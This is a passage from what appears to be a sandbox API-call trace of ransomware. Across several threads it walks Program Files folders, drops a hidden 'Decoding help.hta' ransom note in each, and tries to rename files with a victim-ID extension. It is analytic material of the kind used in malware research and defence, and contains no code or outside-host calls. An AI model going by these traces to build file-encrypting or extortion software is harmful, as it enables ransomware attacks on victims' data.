ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.404] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.404] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.404] FindNextFileW (in: hFindFile=0x10fbc998, lpFindFileData=0x2ce2fd30 | out: lpFindFileData=0x2ce2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe721d8e0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe7432bf6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe7458d53, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.404] lstrcpyW (in: lpString1=0x250f7848, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*" [0059.404] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*") returned 64 [0059.404] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\Decoding help.hta" [0059.404] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\decoding help.hta")) returned 0xffffffff [0059.404] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.660] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2ce2fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2ce2fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.661] CloseHandle (hObject=0x4bc) returned 1 [0060.661] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.879] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.880] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.880] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*" [0060.880] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*") returned 64 [0060.880] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui" [0060.880] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui" [0060.880] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.880] FindNextFileW (in: hFindFile=0x10fbc998, lpFindFileData=0x2ce2fd30 | out: lpFindFileData=0x2ce2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe721d8e0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe7432bf6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe7458d53, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.880] FindClose (in: hFindFile=0x10fbc998 | out: hFindFile=0x10fbc998) returned 1 Thread: id = 900 os_tid = 0xa58 [0055.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*.*", lpFindFileData=0x2cf6fd30 | out: lpFindFileData=0x2cf6fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8ad0 [0061.984] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.984] FindNextFileW (in: hFindFile=0x5d8ad0, lpFindFileData=0x2cf6fd30 | out: lpFindFileData=0x2cf6fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.984] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.984] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.984] FindNextFileW (in: hFindFile=0x5d8ad0, lpFindFileData=0x2cf6fd30 | out: lpFindFileData=0x2cf6fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fcc1ca4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fcc1ca4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 Thread: id = 901 os_tid = 0x9f8 [0055.201] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*.*", lpFindFileData=0x2d0afd30 | out: lpFindFileData=0x2d0afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671770 [0057.528] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.529] FindNextFileW (in: hFindFile=0x671770, lpFindFileData=0x2d0afd30 | out: lpFindFileData=0x2d0afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.529] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0057.529] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.529] FindNextFileW (in: hFindFile=0x671770, lpFindFileData=0x2d0afd30 | out: lpFindFileData=0x2d0afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70562bb6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70562bb6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d35f55b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0x0, dwReserved1=0x0, cFileName="720x480blacksquare.png", cAlternateFileName="")) returned 1 [0057.529] lstrcpyW (in: lpString1=0x971a1c8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*.*" [0057.529] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*.*") returned 63 [0057.529] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Decoding help.hta" [0057.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\decoding help.hta")) returned 0xffffffff [0057.529] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbd0 [0060.373] WriteFile (in: hFile=0xbd0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2d0afcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2d0afcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.582] CloseHandle (hObject=0xbd0) returned 1 [0061.582] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 902 os_tid = 0xa08 [0055.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*.*", lpFindFileData=0x2d1efd30 | out: lpFindFileData=0x2d1efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa198102e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f140c0 [0062.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.530] FindNextFileW (in: hFindFile=0x10f140c0, lpFindFileData=0x2d1efd30 | out: lpFindFileData=0x2d1efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa198102e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.531] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.531] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.531] FindNextFileW (in: hFindFile=0x10f140c0, lpFindFileData=0x2d1efd30 | out: lpFindFileData=0x2d1efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72003fbd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72003fbd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e55fac9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x39eaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notes_INTRO_BG.wmv", cAlternateFileName="")) returned 1 Thread: id = 903 os_tid = 0x97c [0055.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*", lpFindFileData=0x2d32fd30 | out: lpFindFileData=0x2d32fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc8d8 [0059.401] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.401] FindNextFileW (in: hFindFile=0x10fbc8d8, lpFindFileData=0x2d32fd30 | out: lpFindFileData=0x2d32fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.401] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.401] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.401] FindNextFileW (in: hFindFile=0x10fbc8d8, lpFindFileData=0x2d32fd30 | out: lpFindFileData=0x2d32fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead074bc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeaef6675, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeaef6675, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.401] lstrcpyW (in: lpString1=0x24faf2f0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*" [0059.401] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*") returned 64 [0059.401] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\Decoding help.hta" [0059.401] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\decoding help.hta")) returned 0xffffffff [0059.401] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.655] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2d32fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2d32fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.656] CloseHandle (hObject=0x4bc) returned 1 [0060.656] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.876] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.876] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.876] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*" [0060.876] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*") returned 64 [0060.876] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui" [0060.876] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui" [0060.876] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.878] FindNextFileW (in: hFindFile=0x10fbc8d8, lpFindFileData=0x2d32fd30 | out: lpFindFileData=0x2d32fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead074bc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeaef6675, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeaef6675, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.878] FindClose (in: hFindFile=0x10fbc8d8 | out: hFindFile=0x10fbc8d8) returned 1 Thread: id = 904 os_tid = 0x408 [0055.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*", lpFindFileData=0x2d46fd30 | out: lpFindFileData=0x2d46fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc918 [0059.402] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.402] FindNextFileW (in: hFindFile=0x10fbc918, lpFindFileData=0x2d46fd30 | out: lpFindFileData=0x2d46fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.402] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.402] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.402] FindNextFileW (in: hFindFile=0x10fbc918, lpFindFileData=0x2d46fd30 | out: lpFindFileData=0x2d46fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4fe5f52, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe52213c5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5247522, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.402] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*" [0059.402] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*") returned 64 [0059.402] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\Decoding help.hta" [0059.402] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\decoding help.hta")) returned 0xffffffff [0059.402] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.657] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2d46fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2d46fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.658] CloseHandle (hObject=0x4bc) returned 1 [0060.658] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.877] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.877] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.877] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*" [0060.877] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*") returned 64 [0060.877] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui" [0060.877] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui" [0060.877] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.878] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 